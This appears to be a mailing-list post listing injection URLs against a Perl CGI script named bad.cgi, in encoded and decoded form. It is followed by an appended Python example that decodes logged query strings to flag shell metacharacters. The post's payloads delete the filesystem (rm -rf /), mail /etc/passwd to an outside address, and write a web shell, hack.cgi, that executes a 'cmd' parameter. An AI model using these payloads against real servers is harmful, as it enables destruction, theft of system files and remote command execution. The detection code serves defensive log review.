bad.cgi?var%3Dtext%3B%60rm%20-rf%20%2F%60
or
bad.cgi?var%3Dtext%3Bwarn%20%27ha%27%20while%201
or
bad.cgi?var%3Dtext%3B%60mail%20%3C%20%2Fetc%2Fpasswd%20me%40isp.com%60
or
bad.cgi?var%3Dtext%3B%60echo%20%27%23%21%2Fusr%2Flocal%2Fbin%2Fperl%27%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27use%20CGI%20qw%2F%3Aall%2F%3B%27%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27%24cmd%20%3D%20param%28%22cmd%22%29%3B%27%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27print%20header%2Cstart_html%3B%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60echo%20%27print%20%5C%60%24cmd%5C%60%2C%20end_html%3B%20%3E%20hack.cgi%60
bad.cgi?var%3Dtext%3B%60chmod%20%2Bx%20hack.cgi%60
Which are the equivalents of:
bad.cgi?var=text;`rm -rf /`
or
bad.cgi?var=text;warn 'ha' while 1
or
bad.cgi?var=text;`mail < /etc/passwd me@isp.com`
or
bad.cgi?var=text;`echo '#!/usr/local/bin/perl' > hack.cgi`
bad.cgi?var=text;`echo 'use CGI qw/:all/;' > hack.cgi`
bad.cgi?var=text;`echo '$cmd = param("cmd");' > hack.cgi`
bad.cgi?var=text;`echo 'print header,start_html; > hack.cgi`
bad.cgi?var=text;`echo 'print \`$cmd\`, end_html; > hack.cgi`
bad.cgi?var=text;`chmod +x hack.cgi`
I have not tested this, though. :-)
--
Casey
I am a superhero.
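
As an added example (not part of the post above), a log check that percent-decodes each query string before looking for the characters these requests depend on. The log lines are constructed from the URLs in the post, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Characters that let a value break out into a Perl eval or a shell:
# backtick, ';', '|', '<', '>' and '$('.
SUSPICIOUS = re.compile(r"[`;|<>]|\$\(")

def normalize(raw, max_rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded input is caught."""
    for _ in range(max_rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def inspect_request(request_line):
    """Return (decoded_query, matched_tokens) for a 'METHOD target HTTP/x' line."""
    parts = request_line.split()
    if len(parts) < 2:
        return "", []
    # Decode the whole query, not per key/value pair: in the post's URLs even
    # the '=' is encoded (%3D), so a pair-splitting parser sees no parameter.
    decoded = normalize(urlsplit(parts[1]).query)
    return decoded, sorted(set(SUSPICIOUS.findall(decoded)))

def flag_lines(lines):
    """Return (line, decoded_query, tokens) for every line with a match."""
    flagged = []
    for line in lines:
        decoded, tokens = inspect_request(line)
        if tokens:
            flagged.append((line, decoded, tokens))
    return flagged

# Constructed sample request lines (two taken from the URLs in the post).
SAMPLE_LOG = [
    "GET /bad.cgi?var=text HTTP/1.0",
    "GET /bad.cgi?var%3Dtext%3Bwarn%20%27ha%27%20while%201 HTTP/1.0",
    "GET /bad.cgi?var%3Dtext%3B%60mail%20%3C%20%2Fetc%2Fpasswd%20me%40isp.com%60 HTTP/1.0",
    "GET /bad.cgi?var=text%253Bwarn HTTP/1.0",  # double-encoded ';'
]

if __name__ == "__main__":
    for line, decoded, tokens in flag_lines(SAMPLE_LOG):
        print(tokens, decoded)
```

Some CGI libraries accept `;` as a parameter separator, so a lone `;` match is a lead to review rather than a verdict.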